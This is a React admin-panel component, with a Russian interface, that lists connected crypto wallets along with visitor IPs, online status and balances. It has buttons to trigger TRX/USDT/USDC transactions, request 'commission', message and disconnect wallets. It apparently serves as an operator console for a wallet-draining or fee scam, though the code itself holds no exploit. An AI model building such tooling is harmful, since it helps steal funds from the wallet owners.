import React, {useEffect, useState} from "react";
import {socket} from "../../sockets/socket.js";
import "./AdminPanel.css";

const AdminPanel = () => {
    const [wallets, setWallets] = useState([]);
    const [filter, setFilter] = useState("all");
    const [search, setSearch] = useState("");
    const [expandedHistories, setExpandedHistories] = useState({});

    // Добавляем сокетный статус для отслеживания подключения клиента
    useEffect(() => {
        socket.emit("admin:getWallets");

        // Обработчик получения списка кошельков
        socket.on("admin:walletList", setWallets);

        return () => {
            socket.off("admin:walletList");
        };
    }, []);

    const handleTx = (address, amount, coin) => {
        if (!amount) return;
        socket.emit("admin:sendTx", {
            address,
            amount,
            coin
        });
    };

    const handleSendMessage = (address, message) => {
        if (!message) return;
        socket.emit("admin:sendMessage", {address, message});
    };

    const handleTakeReport = (address) => {
        socket.emit("admin:reportDone", address);
    };

    const handleUnarchive = (address) => {
        socket.emit("admin:unarchiveWallet", address);
    };

    const handleDisconnect = (address) => {
        socket.emit("admin:disconnectWallet", address);
    };

    const handleRequestCommission = (address, coin) => {
        socket.emit("admin:requestCommission", {address, coin});
    };

    const handleUpdateBalances = (address, isWalletConnected) => {
        socket.emit("admin:updateBalances", {address, isWalletConnected});
    };

    // При подготовке данных
    const filtered = wallets
        .filter(wallet => {
            // Фильтрация на основе состояния filter
            if (filter === "online") return wallet.online;
            if (filter === "connected") return wallet.isWalletConnected;
            if (filter === "onlineAndConnected") return wallet.online && wallet.isWalletConnected;
            if (filter === "offline") return !wallet.online;

            return wallet;
        })

    console.log(filtered); // Печать для отладки


    return (
        <div className="admin-panel">
            <div className="admin-header">
                <input
                    type="text"
                    placeholder="Поиск по адресу"
                    value={search}
                    onChange={(e) => setSearch(e.target.value)}
                />
                <select value={filter} onChange={(e) => setFilter(e.target.value)}>
                    <option value="all">Все</option>
                    <option value="online">Онлайн</option>
                    <option value="connected">Подключен кошелек</option>
                    <option value="onlineAndConnected">Онлайн и подключен кошелек</option>
                    <option value="offline">Оффлайн</option>
                    <option value="archived">Архив</option>
                    <option value="new">Новые</option>
                </select>
            </div>

            <div className="wallet-list">
                {filtered.map(walletData => {

                    return (
                        // <div className={`wallet-card ${walletData.isNew ? "new-wallet" : ""}`} key={walletData.ip}>
                        <div className={`wallet-card ${walletData.online ? "new-wallet" : ""}`}
                             key={`${walletData.ip}-${walletData.address || ''}`}>
                            <div className="wallet-header">
                                <div className="network-logo">🌐</div>
                                <div className="wallet-status">
                                    <p>{walletData.online ? "🟢 Онлайн" : "🔴 Оффлайн"}</p>
                                    <p>{walletData.isWalletConnected ? " 🟢 Подключен кошелек" : "🔴 Кошелек не подключен"}</p>
                                </div>
                                <div className="wallet-ip">
                                    <span>IP: {walletData.ip}</span> {/* IP адрес */}
                                    {/* Добавление флага страны можно добавить при наличии такой информации */}
                                </div>
                            </div>

                            {/* Список подключенных кошельков  key={index} */}
                            <div className="wallet-balances">
                                <div className="wallet-item">
                                    <span>{walletData.address}</span>
                                    {walletData?.balances?.map((token, tokenIndex) => (
                                        <span key={tokenIndex}
                                              className="token">{token.symbol}: {token.amount}</span>
                                    ))}
                                </div>
                                <button
                                    onClick={() => handleUpdateBalances(walletData.address, walletData.isWalletConnected)}>Обновить
                                    балансы
                                </button>
                            </div>


                            <div className="wallet-actions">
                                {/* Комиссия */}
                                <div className="action-row">
                                    {/*<input
                                        type="number"
                                        placeholder="Комиссия"
                                        id={`commission-${walletData.address}`}
                                    />*/}

                                    <div className="action-buttons">
                                        <button onClick={() => handleRequestCommission(walletData.address, 'TRX')}>
                                            Коммисия для TRX
                                        </button>
                                        <button onClick={() => handleRequestCommission(walletData.address, 'USDT')}>
                                            Коммисия для USDT
                                        </button>
                                    </div>


                                </div>

                                {/* Сумма и кнопки отправки */}
                                <div className="action-row">
                                    <input
                                        type="number"
                                        placeholder="Сумма"
                                        id={`amount-${walletData.address}`}
                                    />
                                    <div className="action-buttons">
                                        <button onClick={() => handleTx(walletData.address, document.getElementById(`amount-${walletData.address}`).value, 'TRX')}>TRX</button>
                                        <button onClick={() => handleTx(walletData.address, document.getElementById(`amount-${walletData.address}`).value, 'USDT')}>USDT</button>
                                        <button onClick={() => handleTx(walletData.address, document.getElementById(`amount-${walletData.address}`).value, 'USDC')}>USDC</button>
                                    </div>
                                </div>

                                {/* Сообщение и отправка */}
                                <div className="action-row">
                                    <input
                                        type="text"
                                        placeholder="Сообщение"
                                        id={`msg-${walletData.address}`}
                                    />
                                    <button
                                        onClick={() => handleSendMessage(walletData.address, document.getElementById(`msg-${walletData.address}`).value)}
                                    >
                                        📨
                                    </button>
                                </div>

                                {/* Управление архивом и отключением */}
                                <div className="control-buttons">
                                    <button onClick={() => handleTakeReport(walletData.address)}>Выдать отчет</button>
                                    <button className="disconnect"
                                            onClick={() => handleDisconnect(walletData.address)}>Отключить
                                    </button>
                                </div>

                                {/* История действий */}
                                <div className="wallet-history"><p
                                    className="history-title">История действий:</p>
                                    <ul>
                                        {walletData.fullHistory.map((item, index) => (
                                            <li key={index}> <span
                                                className="history-time">{new Date(item.timestamp).toLocaleTimeString().slice(0, 8)}</span> — {item.type}
                                            </li>
                                        ))}
                                    </ul>
                                </div>

                            </div>
                        </div>
                    );
                })}
            </div>
        </div>
    );
};

export default AdminPanel;
